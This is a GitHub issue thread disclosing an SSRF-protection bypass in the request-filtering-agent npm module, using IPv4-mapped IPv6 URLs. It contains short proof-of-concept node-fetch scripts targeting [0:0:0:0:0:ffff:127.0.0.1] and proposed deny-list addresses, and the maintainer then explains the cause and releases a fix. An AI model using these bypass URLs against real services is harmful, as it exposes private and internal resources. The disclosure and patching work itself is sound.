[BUG] SSRF protection bypass

[Mik317]

Hi Team :),
I'm a sec-researcher from HackerOne and I've discovered a good way to bypass the SSRF protection using IPv6 formatted URLs ... that aren't correctly checked, allowing me to bypass the protection provided by the module and at the same time, access to the content of private and local resources ;)

I've already reported the issue on the official NPM https://hackerone.com/nodejs-ecosystem program, but the team said it's a "missed functionality and not a bug" ... so I'd like to know how can I report the issue (I add directly the report here?), and if you're ok to consider this a valid issue in order to let me know earn reputation/be awared (probably) with a CVE :).

Best, Mik

[Mik317]

Hi @azu :).
So I can attach here my full report or you prefer I send it privately to you/another team member?

Thank you,
Mik

[azu]

@Mik317 Thanks for report!

Probably, aneone use this module yet.
So, I'm ok that attach the security bug on this issue.
If you have a patch, please submit Pull Request!

If you want to do privately, please follows this docs https://github.com/azu/request-filtering-agent/blob/master/SECURITY.md I created this document, now :)

[Mik317]

OK, I'm going to share part of the report I've already reported on the H1 platform :)

Vulnerability:
SSRF protection bypass due to unchecked IPv6 formatted URLs allowed by the module

Vulnerability Description:
The issue is really simple: it's a SSRF.
The worst thing is due to the fact that the module should protect from this attack, but it's simply bypassable, leading to various impacts: private data disclosure, port scanning and XSPA attacks and finally pivoting inside a private network.

Steps To Reproduce:

1. Download the module using the following command: npm i request-filtering-agent
2. Create a PoC file named poc.js with the following code:

const fetch = require("node-fetch");
const { useAgent } = require("request-filtering-agent");
const url = 'http://[0:0:0:0:0:ffff:127.0.0.1]/';
fetch(url, {
    agent: useAgent(url)
}).catch(err => {
    console.log(err);
});

3. Start a simple localserver: you can use nc or a simple python server (in this case, run the following command in bash: python3 -m http.server 80 )
4. node poc.js on terminal
5. You'll receive a request to the localserver you initialized (SSRF protection is bypassed :))
   

Patch:

Check not only for DNS redirection (very well implemented), and IPv4 ips, but also IPv6 urls :)

Adds:
I've showed only the request received by the python local server (you can see the logs of the pyt server), but because the fetcher enables us also to obtain the body of the requested resource, it's possible obtain the complete response body :)

//poc.js
const fetch = require("node-fetch");
const { useAgent } = require("request-filtering-agent");
const url = 'http://[0:0:0:0:0:ffff:127.0.0.1]/secret';
fetch(url, {
    agent: useAgent(url)
}).then(res => res.text()).then(body => console.log(body));

Best, Mik

[Mik317]

Regarding the pull request, I'm not a good nodejs developer, however I can try to implement something in order to avoid also IPv6 urls :)

Regarding my second question: would you consider this an issue or a missed functionality?

Best, Mik

[Mik317]

OK, I gave a look to your code, and seems you enable filters against IPv6 urls, like [::] (https://github.com/azu/request-filtering-agent/blob/master/src/request-filtering-agent.ts#L20), but the special crafted URL I've used isn't blocked. This should mean I'm eligible for CVE and report on the H1 platform (asked to them, they're going to analyze the status :)).
.

Also, the check done for IPv6 is limited only to this: https://github.com/azu/request-filtering-agent/blob/master/src/request-filtering-agent.ts#L48

Regarding the fix, I'm working on something similar more a blacklist than a real and well implemented solution (mainly because I don't have much time to do things correctly ...). So, I suggest to add to the denyIPAddressList list, the following addresses (I know blacklisting isn't the perfect fix, but now I'm not able to think to something better to avoid the issue temporary :)):

• [0:0:0:0:0:ffff:127.0.0.1]
• [::ffff:127.0.0.1]
• [::ffff:7f00:1]

I'll let you know if there are other possible bypasses as well :)

Best, Mik

[azu]

Thanks for details.

Currenly, this module use node-ip.
This module define isPrivate method, but something is missing.
(IPv4-mapped IPv6 addresses is not defined)

• https://github.com/indutny/node-ip/blob/43e442366bf5a93493c8c4c36736f87d675b0c3d/lib/ip.js#L302-L314

I will use other IP address parser like ipaddr.js.

[Mik317]

Mh, should I report the issue in mapping them also in their repository?
If yes, can I present your case as per demonstration in a impact analysis?

Best, Mik

[azu]

Mh, should I report the issue in mapping them also in their repository?

I found similar issue.
indutny/node-ip#50

If yes, can I present your case as per demonstration in a impact analysis?

what does it mean?

[azu]

I've tried to fix in #3 and publish https://github.com/azu/request-filtering-agent/releases/tag/1.0.4

I'll investigate IPv6 address testing #4

Thanks again @Mik317

[azu]

Sorry. I overeloooked your question. #2 (comment)

Regarding my second question: would you consider this an issue or a missed functionality?

It is difficult question.
Both.
I think that this is an issue, but this library was missed IPv6 supporting.